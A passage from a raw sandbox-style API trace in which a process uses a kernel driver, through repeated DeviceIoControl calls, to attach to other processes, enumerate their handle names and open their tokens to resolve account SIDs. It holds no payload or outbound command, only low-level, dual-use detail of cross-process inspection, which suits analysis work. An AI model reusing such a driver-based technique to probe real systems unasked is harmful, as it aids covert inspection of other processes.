dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.307] PsLookupProcessByProcessId (in: ProcessId=0x944, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.307] PsAcquireProcessExitSynchronization () returned 0x0 [0246.307] KeStackAttachProcess (in: PROCESS=0xfffffa80020fc740, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020fc740, ApcState=0xfffff880053c85d0) [0246.308] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020d7510, HandleInformation=0x0) returned 0x0 [0246.308] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.308] PsReleaseProcessExitSynchronization () returned 0x2 [0246.308] ObfDereferenceObject (Object=0xfffffa80020fc740) returned 0x12 [0246.308] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.308] ObfDereferenceObject (Object=0xfffffa80020d7510) returned 0x1 [0246.308] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.308] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.308] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.308] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0246.308] PsLookupProcessByProcessId (in: ProcessId=0x944, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.308] PsAcquireProcessExitSynchronization () returned 0x0 [0246.308] KeStackAttachProcess (in: PROCESS=0xfffffa80020fc740, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020fc740, ApcState=0xfffff880053c85d0) [0246.308] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020fccb0, HandleInformation=0x0) returned 0x0 [0246.308] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.308] PsReleaseProcessExitSynchronization () returned 0x2 [0246.308] ObfDereferenceObject (Object=0xfffffa80020fc740) returned 0x12 [0246.308] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.308] ObfDereferenceObject (Object=0xfffffa80020fccb0) returned 0x1 [0246.308] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.308] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.309] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.309] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.309] PsLookupProcessByProcessId (in: ProcessId=0x944, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.309] PsAcquireProcessExitSynchronization () returned 0x0 [0246.309] KeStackAttachProcess (in: PROCESS=0xfffffa80020fc740, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020fc740, ApcState=0xfffff880053c85d0) [0246.309] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.309] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.309] PsReleaseProcessExitSynchronization () returned 0x2 [0246.309] ObfDereferenceObject (Object=0xfffffa80020fc740) returned 0x12 [0246.309] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.309] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.309] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.309] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xc8 [0246.309] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.309] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002108790, HandleInformation=0x0) returned 0x0 [0246.309] ObOpenObjectByPointer (in: Object=0xfffffa8002108790, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.309] ObfDereferenceObject (Object=0xfffffa8002108790) returned 0x14 [0246.309] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa80023ef980 | out: TokenHandle=0xfffffa80023ef980*=0xc4) returned 0x0 [0246.309] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.309] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.309] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.310] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.311] CloseHandle (hObject=0xc4) returned 1 [0246.311] CloseHandle (hObject=0xc8) returned 1 [0246.312] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.312] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.312] PsLookupProcessByProcessId (in: ProcessId=0x954, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.312] PsAcquireProcessExitSynchronization () returned 0x0 [0246.312] KeStackAttachProcess (in: PROCESS=0xfffffa8002108790, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002108790, ApcState=0xfffff880053c85d0) [0246.312] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800210d2b0, HandleInformation=0x0) returned 0x0 [0246.312] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.312] PsReleaseProcessExitSynchronization () returned 0x2 [0246.312] ObfDereferenceObject (Object=0xfffffa8002108790) returned 0x12 [0246.312] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.312] ObfDereferenceObject (Object=0xfffffa800210d2b0) returned 0x1 [0246.312] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.312] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.312] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.312] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0246.312] PsLookupProcessByProcessId (in: ProcessId=0x954, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.312] PsAcquireProcessExitSynchronization () returned 0x0 [0246.312] KeStackAttachProcess (in: PROCESS=0xfffffa8002108790, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002108790, ApcState=0xfffff880053c85d0) [0246.312] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800210bd00, HandleInformation=0x0) returned 0x0 [0246.312] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.313] PsReleaseProcessExitSynchronization () returned 0x2 [0246.313] ObfDereferenceObject (Object=0xfffffa8002108790) returned 0x12 [0246.313] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.313] ObfDereferenceObject (Object=0xfffffa800210bd00) returned 0x1 [0246.313] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.313] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.313] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.313] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.313] PsLookupProcessByProcessId (in: ProcessId=0x954, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.313] PsAcquireProcessExitSynchronization () returned 0x0 [0246.313] KeStackAttachProcess (in: PROCESS=0xfffffa8002108790, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002108790, ApcState=0xfffff880053c85d0) [0246.313] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.313] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.313] PsReleaseProcessExitSynchronization () returned 0x2 [0246.313] ObfDereferenceObject (Object=0xfffffa8002108790) returned 0x12 [0246.313] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.313] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.313] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.313] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x964) returned 0xc8 [0246.313] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.313] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002119b30, HandleInformation=0x0) returned 0x0 [0246.313] ObOpenObjectByPointer (in: Object=0xfffffa8002119b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.314] ObfDereferenceObject (Object=0xfffffa8002119b30) returned 0x14 [0246.314] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa80023ef980 | out: TokenHandle=0xfffffa80023ef980*=0xc4) returned 0x0 [0246.314] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.314] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.314] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.314] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.316] CloseHandle (hObject=0xc4) returned 1 [0246.316] CloseHandle (hObject=0xc8) returned 1 [0246.316] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.316] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.316] PsLookupProcessByProcessId (in: ProcessId=0x964, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.316] PsAcquireProcessExitSynchronization () returned 0x0 [0246.316] KeStackAttachProcess (in: PROCESS=0xfffffa8002119b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002119b30, ApcState=0xfffff880053c85d0) [0246.316] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002103800, HandleInformation=0x0) returned 0x0 [0246.316] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.316] PsReleaseProcessExitSynchronization () returned 0x2 [0246.316] ObfDereferenceObject (Object=0xfffffa8002119b30) returned 0x12 [0246.316] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.316] ObfDereferenceObject (Object=0xfffffa8002103800) returned 0x1 [0246.316] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.316] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.316] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.316] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0246.316] PsLookupProcessByProcessId (in: ProcessId=0x964, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.316] PsAcquireProcessExitSynchronization () returned 0x0 [0246.316] KeStackAttachProcess (in: PROCESS=0xfffffa8002119b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002119b30, ApcState=0xfffff880053c85d0) [0246.316] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002119250, HandleInformation=0x0) returned 0x0 [0246.316] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.316] PsReleaseProcessExitSynchronization () returned 0x2 [0246.316] ObfDereferenceObject (Object=0xfffffa8002119b30) returned 0x12 [0246.317] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.317] ObfDereferenceObject (Object=0xfffffa8002119250) returned 0x1 [0246.317] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.317] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.317] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.317] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.317] PsLookupProcessByProcessId (in: ProcessId=0x964, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.317] PsAcquireProcessExitSynchronization () returned 0x0 [0246.317] KeStackAttachProcess (in: PROCESS=0xfffffa8002119b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002119b30, ApcState=0xfffff880053c85d0) [0246.317] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.317] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.317] PsReleaseProcessExitSynchronization () returned 0x2 [0246.317] ObfDereferenceObject (Object=0xfffffa8002119b30) returned 0x12 [0246.317] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.317] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.317] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.317] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.317] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x974) returned 0xc8 [0246.317] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.317] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002123060, HandleInformation=0x0) returned 0x0 [0246.317] ObOpenObjectByPointer (in: Object=0xfffffa8002123060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.317] ObfDereferenceObject (Object=0xfffffa8002123060) returned 0x14 [0246.317] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa80023ef980 | out: TokenHandle=0xfffffa80023ef980*=0xc4) returned 0x0 [0246.318] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.318] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.318] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.318] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.319] CloseHandle (hObject=0xc4) returned 1 [0246.320] CloseHandle (hObject=0xc8) returned 1 [0246.320] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.320] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.320] PsLookupProcessByProcessId (in: ProcessId=0x974, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.320] PsAcquireProcessExitSynchronization () returned 0x0 [0246.320] KeStackAttachProcess (in: PROCESS=0xfffffa8002123060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002123060, ApcState=0xfffff880053c85d0) [0246.320] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020e7840, HandleInformation=0x0) returned 0x0 [0246.320] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.320] PsReleaseProcessExitSynchronization () returned 0x2 [0246.320] ObfDereferenceObject (Object=0xfffffa8002123060) returned 0x12 [0246.320] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.320] ObfDereferenceObject (Object=0xfffffa80020e7840) returned 0x1 [0246.320] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.320] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.320] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.320] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x6a, lpOverlapped=0x0) returned 1 [0246.320] PsLookupProcessByProcessId (in: ProcessId=0x974, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.320] PsAcquireProcessExitSynchronization () returned 0x0 [0246.320] KeStackAttachProcess (in: PROCESS=0xfffffa8002123060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002123060, ApcState=0xfffff880053c85d0) [0246.320] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ffadd0, HandleInformation=0x0) returned 0x0 [0246.320] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.320] PsReleaseProcessExitSynchronization () returned 0x2 [0246.320] ObfDereferenceObject (Object=0xfffffa8002123060) returned 0x12 [0246.320] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.321] ObfDereferenceObject (Object=0xfffffa8001ffadd0) returned 0x1 [0246.321] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.321] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.321] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.321] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.321] PsLookupProcessByProcessId (in: ProcessId=0x974, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.321] PsAcquireProcessExitSynchronization () returned 0x0 [0246.321] KeStackAttachProcess (in: PROCESS=0xfffffa8002123060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002123060, ApcState=0xfffff880053c85d0) [0246.321] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, 